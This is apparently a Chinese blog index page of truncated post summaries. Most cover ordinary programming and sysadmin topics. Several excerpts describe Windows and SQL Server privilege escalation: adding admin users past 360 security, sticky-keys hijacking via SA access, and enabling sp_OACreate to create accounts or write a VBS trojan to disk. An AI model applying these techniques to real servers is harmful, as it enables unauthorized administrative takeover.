正文内容加载中...
posted @ 2015-09-25 15:50 小0 阅读 (176) 评论 (0) 编辑
摘要:Eclipse中window->Preferences->Java->Editor->Content Assist->Advanced->顶部的选项卡Select the proposal kinds contained in the 'default' content assist list: 中... 阅读全文
posted @ 2015-09-19 19:21 小0 阅读 (45) 评论 (0) 编辑
摘要:启动mysql时报错:Starting mysqld daemon with databases from /var/lib/mysqlSTOPPING server from pid file /var/run/mysqld/mysqld.pid071112 00:22:06 mysqld ended查看日志:#less /var/log/mysqld.log其中有一段如下:071112 0:22:06 [ERROR] /usr/local/mysql/bin/mysqld: Can't create/write to file '/var/run/mysqld/mysqld 阅读全文
posted @ 2012-09-04 16:41 小0 阅读 (304) 评论 (0) 编辑
摘要:linuxmount -t vboxsf Share /mnt/Share第一个Share是共享的主机文件夹的名字 第二个/mnt/Share是linux下的文件Solarismount -F vboxfs Share /mnt/Share linux是vboxsf unix是vboxfs 阅读全文
posted @ 2012-08-15 19:51 小0 阅读 (53) 评论 (0) 编辑
摘要:package com.pb.collection;import java.util.HashMap;import java.util.Iterator;import java.util.Set;import java.util.Map.Entry;public class HashMapDemo { public static void main(String[] args) { HashMap<String, String> hashMap = new HashMap<String, String>(); hashMap.put("cn",... 阅读全文
posted @ 2012-08-09 12:41 小0 阅读 (96) 评论 (0) 编辑
摘要:360功能多,现在大多管理员图省事喜欢安个360。360有个防黑加固功能比较坑爹,提权的时候经常会用到net user xxx xxx /add&net localgroup xxx xxx/add.360会拦截,如图:net user 和 net1 user 都被拦截了,改名执行也拦截,想想这功能也不能这么鸡肋。当然360还会拦截其他命令,这次只对net user xxx xx /add做讨论。于是索性自己用C写一个吧,果断被360无视了,如图:源码://Code by Pnig0s1992 //Date:2012,3,17 #include <stdio.h> #inc 阅读全文
posted @ 2012-08-09 12:33 小0 阅读 (97) 评论 (0) 编辑
摘要:Sa提权方式很多,而最快捷的方式就是shift粘滞键镜像劫持。这种Sa提权方法必须满足几个条件,数据库可以远程访问,服务器开启了终端远程访问也就是3389和粘滞键功能。这样就可以利用Microsoft SQL Server Management Studio或其他漏洞检测工具来连接远程数据库了。个人推荐使用Microsoft SQL Server Management Studio,可以到微软官方下载地址:http://www.microsoft.com/web/downloads/platform.aspx。如果不用数据库可以不安装,选装Microsoft SQL Server Manage 阅读全文
posted @ 2012-08-09 12:31 小0 阅读 (424) 评论 (0) 编辑
摘要:在xp_cmdshell被删除或者出错情况下,可以充分利用SP_OACreate进行提权首先EXEC sp_configure 'show advanced options', 1; RECONFIGURE WITH OVERRIDE; EXEC sp_configure 'Ole Automation Procedures', 1; RECONFIGURE WITH OVERRIDE; EXEC sp_configure 'show advanced options', 0;打开组件,2005中默认关闭1)直接加用户2000系统:declare 阅读全文
posted @ 2012-08-09 12:25 小0 阅读 (745) 评论 (0) 编辑
摘要:1433 SQL数据连接写入小马declare @o int, @f int, @t int, @ret intexec sp_oacreate 'scripting.filesystemobject', @o outexec sp_oamethod @o, 'createtextfile', @f out, 'c:\1.vbs', 1exec @ret = sp_oamethod @f, 'writeline', NULL,'set wsnetwork=CreateObject("WSCRIPT.NETWORK 阅读全文
posted @ 2012-08-09 12:24 小0 阅读 (318) 评论 (0) 编辑
摘要:<span style="font-size: medium;">refresh.jsp <%@ page contentType="text/html;charset=UTF-8" language="java" %><head><META http-equiv=Content-Type content="text/html; charset=UTF-8"></head><script language="javascript" 阅读全文
posted @ 2012-08-09 12:14 小0 阅读 (102) 评论 (0) 编辑